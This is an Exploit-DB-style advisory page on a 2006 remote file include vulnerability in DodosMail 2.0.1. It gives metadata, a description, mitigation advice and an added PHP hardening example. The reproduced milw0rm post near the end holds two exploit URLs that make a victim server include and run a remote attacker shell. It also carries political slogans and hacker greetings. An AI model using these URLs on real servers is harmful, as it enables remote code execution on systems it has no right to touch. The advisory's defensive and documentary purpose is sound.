Vendor: DodosMail
By: CoLd Zero
CVSS: 7.5 (HIGH)
Remote File Include Vulnerability
CWE: 98
Product Name: DodosMail
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:regretless:dodosmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability

DodosMail 2.0.1 contains a remote file include vulnerability in the dodosmail.php script: the values of the dodosmail_header_file and dodosmail_footer_file parameters are passed to include functions without validation. An attacker who supplies a URL in either parameter can have the remote file included and executed, allowing arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of DodosMail and ensure that all user input is properly sanitized.
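To make the mitigation concrete, the following is an added PHP example (not DodosMail's own code) that shows the vulnerable include pattern described above beside a hardened replacement that only includes files chosen from a fixed allowlist. It assumes the include parameter reaches the script as request input (for example via register_globals or a direct $_GET read) and assumes a `templates/` directory layout.

```php
<?php
// Added example, not code from DodosMail. Vulnerable include pattern as
// described in the advisory, followed by an allowlist-based replacement.

// --- Vulnerable pattern ----------------------------------------------------
// When $dodosmail_header_file is taken straight from the request, a remote
// URL in it is fetched and executed if allow_url_include/allow_url_fopen permit.
function include_dodosmail_header_vulnerable($dodosmail_header_file) {
    include_once($dodosmail_header_file);
}

// --- Hardened replacement --------------------------------------------------
// Assumed layout: templates live in a fixed directory next to this script.
// The request may only choose a key; it never supplies a path or a URL.
const DODOSMAIL_TEMPLATE_DIR = __DIR__ . '/templates';
const DODOSMAIL_TEMPLATES = [
    'header' => 'dodosmail_header.php',
    'footer' => 'dodosmail_footer.php',
];

function resolve_dodosmail_template(string $requested): ?string {
    // 1. Reject anything that is not an allowlisted key.
    if (!array_key_exists($requested, DODOSMAIL_TEMPLATES)) {
        return null;
    }
    $candidate = DODOSMAIL_TEMPLATE_DIR . '/' . DODOSMAIL_TEMPLATES[$requested];
    // 2. Defence in depth: the resolved file must exist and must still sit
    //    inside the template directory (realpath collapses any ../ or symlink).
    $real = realpath($candidate);
    $base = realpath(DODOSMAIL_TEMPLATE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function include_dodosmail_template_hardened(string $requested): void {
    $path = resolve_dodosmail_template($requested);
    if ($path === null) {
        // Fail closed: never echo the rejected value back unescaped.
        echo "<!-- DodosMail: requested template not available -->\n";
        return;
    }
    include_once $path;
}

// The request can only select "header" or "footer"; everything else is ignored.
$requested = $_GET['dodosmail_header_file'] ?? 'header';
include_dodosmail_template_hardened(is_string($requested) ? $requested : 'header');
```

Independently of the code fix, setting `allow_url_include = Off` in php.ini removes the ability to include remote URLs at all, which limits this class of bug to local files even where an include path is still attacker-influenced.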

Exploit-DB raw data:

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


######################################################
#
#            DodosMail 2.0.1
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-07
# Remote:    Yes
# Type:      dangerous
# Site:      http://regretless.com/scripts/scripts.php#dodosrangen
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

File:

dodosmail.php

==========================

       include_dodosmail_header($dodosmail_header_file);
       echo "<p class=\"DodosMailError\">DodosMail Error - the owner the php server is experiencing techinical difficulties. Please email use ".dodosmail_error_handle($your_email_address)." to send your email.\n";
       echo "<br /><br /><a href=\"javascript:history.back(1)\">Back</a>\n";
       echo "</p>\n";
include_dodosmail_footer($dodosmail_footer_file);


======================================================

Exploit :

Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_header_file=http://coldzero.shell
Http://www.Victem.0/[DodosMail_PaTH]/dodosmail.php?dodosmail_footer_file=http://coldzero.shell

======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR]



#www.4azhar Team                >>      www.4azhar.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org






# milw0rm.com [2006-11-08]